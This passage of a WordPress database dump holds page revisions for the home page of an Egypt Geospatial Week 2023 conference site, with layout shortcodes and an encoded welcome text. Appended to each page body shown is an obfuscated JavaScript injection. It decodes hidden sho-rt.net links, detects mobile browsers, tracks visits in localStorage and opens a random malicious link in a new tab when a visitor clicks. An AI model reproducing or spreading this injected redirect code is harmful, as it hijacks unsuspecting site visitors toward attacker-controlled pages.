_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 17:51:41','2022-10-05 17:51:41','',2167,'https://gsw2023.com/?p=2293',0,'revision','',0),
(2294,1,'2022-10-05 17:55:48','2022-10-05 17:55:48','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_column_text][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklM0IlMjIlM0VBcyUyMHdlJTIwY2VsZWJyYXRlJTIwb3VyJTIwNTB0aCUyMGFubml2ZXJzYXJ5JTJDJTIwdGhlJTIwQXJhYiUyMEFjYWRlbXklMjBmb3IlMjBTY2llbmNlJTJDJTIwVGVjaG5vbG9neSUyQyUyMGFuZCUyME1hcml0aW1lJTIwVHJhbnNwb3J0JTIwJTI4QUFTVE1UJTI5JTIwaXMlMjBob25vcmVkJTIwdG8lMjBob3N0JTIwdGhlJTIwSVNQUlMlMjBmaXJzdCUyMEdlb3NwYXRpYWwlMjBXZWVrJTIwaW4lMjBBZnJpY2ElMjBhbmQlMjBNaWRkbGUlMjBFYXN0JTIwaW4lMjAyMDIzJTIwJTI4R1NXLTIwMjMlMjklMjB0aGF0JTIwd2lsbCUyMGJlJTIwaGVsZCUyMHVuZGVyJTIwdGhlJTIwYXVzcGljZXMlMjBvZiUyMEguRSUyMFNlY3JldGFyeS1HZW5lcmFsJTIwb2YlMjB0aGUlMjBMZWFndWUlMjBvZiUyMEFyYWIlMjBTdGF0ZXMuJTIwVGhlJTIwY29uZmVyZW5jZSUyMHdpbGwlMjBiZSUyMGhlbGQlMjBpbiUyMFNlcHRlbWJlciUyMDIwMjMlMkMlMjBhdCUyMHRoZSUyMEludGVyQ29udGluZW50YWwlMjBDYWlybyUyMENpdHklMjBzdGFycyUyMENhaXJvJTJDJTIwRWd5cHQuJTIwQUFTVE1UJTIwc3Ryb25nbHklMjBiZWxpZXZlcyUyMHRoYXQlMjBzY2llbmNlJTIwaXMlMjB0aGUlMjBrZXklMjB0byUyMHRoZSUyMGZ1dHVyZSUyMGFuZCUyMHRoZSUyMGNvcm5lcnN0b25lJTIwZm9yJTIwbmF0aW9ucyUyNyUyMHByb2dyZXNzJTIwYW5kJTIwcHJvc3Blcml0eS4lMjBJdCUyMGlzJTIwdGhlJTIwcHJpbWFyeSUyMGZhY3RvciUyMGZvciUyMGh1bWFuJTIwYWNoaWV2ZW1lbnRzJTIwdGhyb3VnaG91dCUyMGFsbCUyMGFnZXMuJTIwQUFTVE1UJTIwaGFzJTIwYSUyMGhvc3QlMjBvZiUyMHF1YWxpZmllZCUyMHByb2Zlc3NvcnMlMjBhbmQlMjBleHBlcnRzJTIwd2hvJTIwYXJlJTIwY2FwYWJsZSUyMG9mJTIwc3VwcG9ydGluZyUyMEFyYWIlMjBhbmQlMjBBZnJpY2FuJTIwY291bnRyaWVzJTIwaW4lMjB2YXJpb3VzJTIwc2NpZW50aWZpYyUyMGZpZWxkcy4lMjBUaGUlMjBHU1clMjB3aWxsJTIwcHJvdmlkZSUyMGElMjBwbGF0Zm9ybSUyMGZvciUyMGludGVybmF0aW9uYWwlMjBzY2hvbGFycyUyQyUyMGdyYWR1YXRlJTIwc3R1ZGVudHMlMkMlMjBmdXR1cmUlMjBzY2llbnRpc3RzJTIwYW5kJTIwaW5kdXN0cmlhbCUyMHNlY3RvcnMlMjB0byUyMGxlYXJuJTIwZXhjaGFuZ2UlMjBrbm93bGVkZ2UlMjBhbmQlMjBleHBlcmllbmNlcyUyMG9mJTIwYXBwbHlpbmclMjBnZW9zcGF0aWFsJTIwdGVjaG5vbG9naWVzJTIwZm9yJTIwc3VzdGFpbmFibGUlMjBkZXZlbG9wbWVudCUyMGZvciUyMGJldHRlciUyMHF1YWxpdHklMjBvZiUyMGxpZmUlMjBmb3IlMjBwZW9wbGUlMjBhcm91bmQlMjB0aGUlMjB3b3JsZC4lMjBXZSUyMHdvdWxkJTIwbGlrZSUyMHRvJTIwdGFrZSUyMHRoaXMlMjBvcHBvcnR1bml0eSUyMHRvJTIwd2VsY29tZSUyMHlvdSUyMHRvJTIwQ2Fpcm8lMjBhJTIwdmlicmFudCUyQyUyMGV4aGlsYXJhdGluZyUyQyUyMGV4b3RpYyUyQyUyMGZhc2NpbmF0aW5nJTIwYW5kJTIwd2VsY29taW5nJTIwY2l0eS4lMjBIb21lJTIwdG8lMjB0aGUlMjBiZXN0JTIwUGhhcmFvbmljJTJDJTIwQ29wdGljJTIwYW5kJTIwSXNsYW1pYyUyMHNpZ2h0cyUyMGluJTIwRWd5cHQuJTIwQ2Fpcm8lMjBpcyUyMHdoZXJlJTIweW91JTIwbmV2ZXIlMjBrbm93JTIwd2hhdCUyMGluY3JlZGlibGUlMkMlMjBoYWxmLWZvcmdvdHRlbiUyMG1vbnVtZW50JTIweW91JTIwbWlnaHQlMjBzdHVtYmxlJTIwYWNyb3NzJTIwd2hpbGUlMjB3YW5kZXJpbmclMjBhcm91bmQuJTIwRW5qb3klMjB0aGUlMjBOaWxlJTIwdmlldyUyQyUyMHZpc2l0JTIwdGhlJTIwZ3JlYXQlMjBweXJhbWlkcyUyMG9mJTIwR2l6YSUyQyUyMHdhbGslMjB0aHJvdWdoJTIwdGhlJTIwY2FwaXRhbCUyN3MlMjBtZWRpZXZhbCUyMG1hcmtldHMlMjBieSUyMEtoYW4lMjBFbC1LaGFsaWxpJTJDJTIwb3IlMjB3YWxrJTIwZG93biUyMHRoZSUyME5pbGUlMjBwcm9tZW5hZGUuJTIwV2UlMjBsb29rJTIwZm9yd2FyZCUyMHRvJTIwd29ya2luZyUyMHdpdGglMjB0aGUlMjBJU1BSUyUyMGNvdW5jaWwlMkMlMjBjb21taXNzaW9ucyUyMHByZXNpZGVudHMlMkMlMjB3b3JraW5nJTIwZ3JvdXAlMjBvZmZpY2VycyUyQyUyMGFuZCUyMG90aGVyJTIwc2lzdGVyJTIwb3JnYW5pemF0aW9ucyUyMHRvJTIwaGF2ZSUyMGElMjBzdWNjZXNzZnVsJTIwdGVjaG5pY2FsJTIwcHJvZ3JhbSUyMGFuZCUyMGElMjBtZW1vcmFibGUlMjBzb2NpYWwlMjBwcm9ncmFtLiUyMEl0JTIwaXMlMjBncmVhdCUyMHRvJTIwaGF2ZSUyMHRoZSUyMEdTVyUyMGNvbWluZyUyMHRvJTIwRWd5cHQlMjB3aGVyZSUyMG1vc3QlMjBwcm9iYWJseSUyMHRoZSUyMGZpcnN0JTIwbWFwcGluZyUyMHN5c3RlbXMlMjB3ZXJlJTIwZGV2ZWxvcGVkJTIwMTAwMHMlMjB5ZWFycyUyMGFnby4lMjBXZWxjb21lJTIwdG8lMjBHU1clMjcyMDIzJTIwaW4lMjBDYWlybyUyQyUyMEVneXB0LiUzQyUyRnAlM0U=[/vc_raw_html][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 17:55:48','2022-10-05 17:55:48','',2167,'https://gsw2023.com/?p=2294',0,'revision','',0),
(2295,1,'2022-10-05 17:58:32','2022-10-05 17:58:32','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of 